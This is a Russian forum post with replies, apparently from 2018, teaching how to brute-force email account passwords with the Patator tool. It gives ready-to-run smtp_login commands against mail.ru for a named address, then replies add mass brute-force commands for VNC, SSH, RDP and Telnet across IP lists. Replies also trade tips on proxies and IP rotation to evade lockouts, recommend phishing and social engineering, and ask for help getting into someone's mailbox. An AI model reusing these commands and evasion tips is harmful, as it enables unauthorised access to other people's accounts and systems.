Статья Брутим почты с помощью Patator

ALARM
Данная статья предназначена только для ознакомительных целей с софтом.

Автор не несет никакой ответственности за неграмотных кулхацкеров

Всем доброго времени суток.

В связи с последними событиями в моей жизни , пришлось вспомнить старый добрый метод для получения доступа к почте через брут. С тем условием , что я давно не смотрел атаки данного типа , мне стало интересно , что на рынке существует кроме гидры(https://github.com/vanhauser-thc/thc-hydra.git)

Покопавшись в интернетах , я наткнулся на интересную тулзу - Patator(https://github.com/lanjelot/patator.git) На мой взгляд - это достаточно интересная и мощьная тулза , которая позволяет брутить все известные пртоколы.

Итак , теперь разберем все по пунктам отталкиваясь от задачи: Получить пароль от почты.

Первый этап

Для начала нам нужно склонить саму программу.
Код:
git clone https://github.com/lanjelot/patator.git
cd patator
chmod +x ./patator.py

Второй этап

Давайте теперь попробуем запустить программу :)

./patator.py

После запуска у нас должно появиться вот такое окно:
Screenshot from 2018-02-28 03-04-26.png

Ура! Первый старт прошел успешно.

В нашем "меню" мы можем как раз таки ознакомиться о всех возможных векторах атаки , которые предоставляет нам patator.

Третий этап

Теперь давайте займемся разбором нашей задачи , на нужно реализовать smtp_login.


Давайте попробуем ввести команду:
./patator.py smtp_login

Screenshot from 2018-02-28 03-08-40.png

Ага. Теперь мы можем наблюдать еще одно меню , которое позволяет нам настроить непосредственно саму атаку так , как мы хотим.
В принципе , я думаю , что переводить флаги - нет смысла, можно догадаться , что к чему )

Итак ,теперь приступим к самому бруту.
Сразу готов сказать , что синтаксис не привычный.
Теперь добавляем дополнительные параметры к условию задачи:
email - anonqwer@bk.ru

Наконец-то!
Давайте скорее приступим к восстановлению доступа к почте)
Код:
./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt

Screenshot from 2018-02-28 03-36-46.png


И что мы видим?!
Заветное "Authentication succeeded" !
Ура, мы вспомнили пароль :)

А теперь по порядку:

  • host - smtp сервер, где зарегистрирована наша почта (в моем случае - это маил)
  • port - порт , к которому надо коннектить (Капитан очевидность , здравствуйте )
  • ssl - принимает на вход 0 или 1 , в нашем случае мы обязаны использовать ssl
  • user - наш таргет
  • password - принимает словарь , но не путем до файла , а константой FILEn, где n - цифра , в которую мы запишем наш путь до словаря
Четвертый этап

Приводим наш вывод в оптимальный вид , а не как в этих ваших матрицах x)


Patator позволяет нам игнорировать вывод определенных ошибок с помощью дополнительного флага.
В нашем случае - у нас на неккоректные пароли всегда вылетает ошибка "Authentication failed. Please verify your account by going to "
Предлагаю убрать вывод паролей с такой ошибкой
Код:
./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt -x ignore:fgrep='Authentication failed. Please verify your account by going to https://e.mail.ru/login?email=anonqwer@bk.ru'

Screenshot from 2018-02-28 03-47-32.png


Ура! Теперь лишняя информация (хотя она не всегда лишняя) не мусолит нам глаза


Заключение
Вот таким не хитрым способом мы смогли получить доступ к нашей забытой почте.
Не для кого не секрет , что брут почт уже устарел и чтобы пробрутить @gmail.com или @yandex.ru придется подумать несколько раз , чтобы запустить брут. Лучший вектор для получения доступа к личным данным человека - социальная инженерия.

Спасибо за внимание :)

P.S. Моя первая статья , не ругайтесь сильно. Если есть дополнения или замечния, буду признателен услышать их.
 
Последнее редактирование:
проверял на двух своих почтах mail, с внесенными в словарь правильными паролями - ничего не выходит - Authentication failed. Please verify your account by going to
 
  • Нравится
Реакции: Wise
проверял на двух своих почтах mail, с внесенными в словарь правильными паролями - ничего не выходит - Authentication failed. Please verify your account by going to
Если Вы сможете предоставить больше информации, я смогу помочь Вам)
Данный способ был проверен на @gmail @yandex @inbox @mail @bk и даже @yahoo
 
добавил-бы больше команд по VNC и RDP
==============
VNC
patator vnc_login host=FILE0 0=/root/IP.txt password=password port=5901 -t 1000 -l /root/rez/ -x ignore:code=1 -x ignore:fgrep='Authentication failure' -x ignore:code=2
==============
SSH
patator ssh_login host=FILE0 user=admin password=admin 0=/root/IP.txt -t 1000 -l /root/rez -x ignore:code=1 -x ignore:mesg='Authentication failed.'
==============
RDP
patator rdp_login host=FILE0 user=FILE1 password=FILE2 0=/root/ip.txt 1=/root/Logins.txt 3=/root/passwords.txt -x ignore:fgrep='exit status 1'
==============
TELNET
telnet_login host=FILE2 2=/root/IPs.txt inputs='FILE0\nFILE1' 0=/root/logins.txt 1=passwords.txt -t 1000 -l /root/rez/ prompt_re='Username:|Password:' -x ignore:egrep='Login incorrect.+Username:' -x ignore:code='37' -x ignore:code='38' -x ignore:code='49' -x ignore:egrep='nLogin incorrect' -x ignore:code='51'
=================================================================================
если порты отличаются от дефолта прописываем как в пример с vnc
rez - папка с логом

По окончанию работы потом нужно распарить файл с логом там будут результаты INFO это гуды
вот составил регулярку для grep

grep -Eo "INFO.+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" /rez/RESULTS.xml

p.s - для брута почт нужны прокси качественные.
 
Последнее редактирование:
patator vnc_login host=FILE0 0=IP.txt password=pass port=5900 -t 1000 -l /root/rez/ -x ignore:code=1 -x ignore:fgrep='Authentication failure' -x ignore:code=2
patator ssh_login host=FILE0 user=admin password=admin 0=Ip.txt -t 1000 -l /root/rez -x ignore:code=1 -x ignore:mesg='Authentication failed.'

patator rdp_login host=FILE0 user=FILE1 password=FILE2 0=ip.txt 1=/root/Logins.txt 3=/root/passwords.txt -x ignore:fgrep='exit status 1'
Я думаю на рдп и внс можно было бы кейсы раскрыть. Мало кто полез бы ) а так да , спасибо
 
Ты раскрываешь козыря :)
например маил ру гонит в замарозку если с одного ип было 11 не правильных попыток логина. если брутить через api от cloud то ошибок не выдает просто пишет что не валид хотя почта может быть валидная. Заморозкой имею ввиду подозрительная попытка входа пишет. Обходиться сменой IP. Маил ру стало брутить тяжко. Быстрее фишинг заюзать. За другие почты не знаю.
 
например маил ру гонит в замарозку если с одного ип было 11 не правильных попыток логина. если брутить через api от cloud то ошибок не выдает просто пишет что не валид хотя почта может быть валидная. Заморозкой имею ввиду подозрительная попытка входа пишет. Обходиться сменой IP.
На bk и inbox не замечал даже при 100

На остальных гонит , да
 
на list перебор был 4 паролей) правильный стоял четвертым и не был идентифицирован

---- Добавлено позже ----

20:41:48 patator INFO - 535 106 0.105 | 123abc | 6 | Authentication failed. Please verify your account by going to https://e.mail.ru/login?email=*@list.ru
20:41:48 patator INFO - 435 34 0.013 | michael1 | 16 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.014 | lucky1 | 26 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.016 | jessica1 | 36 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.016 | james1 | 46 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.025 | lucky7 | 56 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.015 | lover1 | 66 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.016 | amanda1 | 76 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.016 | taylor1 | 86 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.016 | william1 | 96 | Unable to authenticate at present:
20:41:48 patator INFO - 435 34 0.014 | asshole1 | 106 | Unable to authenticate at present:
20:41:48 patator INFO - 554 25 0.012 | rangers1 | 116 | Too many nonmail commands
 
Последнее редактирование модератором:
на list перебор был 4 паролей) правильный стоял четвертым и не был идентифицирован
Вы хотите убедиться в работоспособности вышеописанного метода , я готов предоставить лист с 10 паролями :) верно ли Вы указали флаги ?
 
или так, по другому адресу:

20:50:54 patator INFO - 535 102 0.044 | 313 | 4 | Authentication failed. Please verify your account by going to
20:50:56 patator FAIL - xxx 87 0.000 | 554332erttghj | 5 | <type 'exceptions.TypeError'> ('not all arguments converted during string formatting',)
20:50:56 patator INFO - Hits/Done/Skip/Fail/Size: 4/5/0/1/5, Avg: 2 r/s, Time: 0h 0m 2s

---- Добавлено позже ----

Вы хотите убедиться в работоспособности вышеописанного метода , я готов предоставить лист с 10 паролями :) верно ли Вы указали флаги ?
как у вас. порт такой же. ssl=1
 
Последнее редактирование модератором:
или так, по другому адресу:

20:50:54 patator INFO - 535 102 0.044 | 313 | 4 | Authentication failed. Please verify your account by going to
20:50:56 patator FAIL - xxx 87 0.000 | 554332erttghj | 5 | <type 'exceptions.TypeError'> ('not all arguments converted during string formatting',)
20:50:56 patator INFO - Hits/Done/Skip/Fail/Size: 4/5/0/1/5, Avg: 2 r/s, Time: 0h 0m 2s

---- Добавлено позже ----


как у вас. порт такой же. ssl=1
И так , в целом я готов предположить где у вас ошибка )

Но , в целом , как пруф к своему посту , держите скрин )
 

Вложения

  • Screenshot from 2018-03-01 16-05-47.png
    Screenshot from 2018-03-01 16-05-47.png
    33 КБ · Просмотры: 438
Друзья, помогите этично заглянуть в почтовый ящик. Самому не хватает квалификации.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!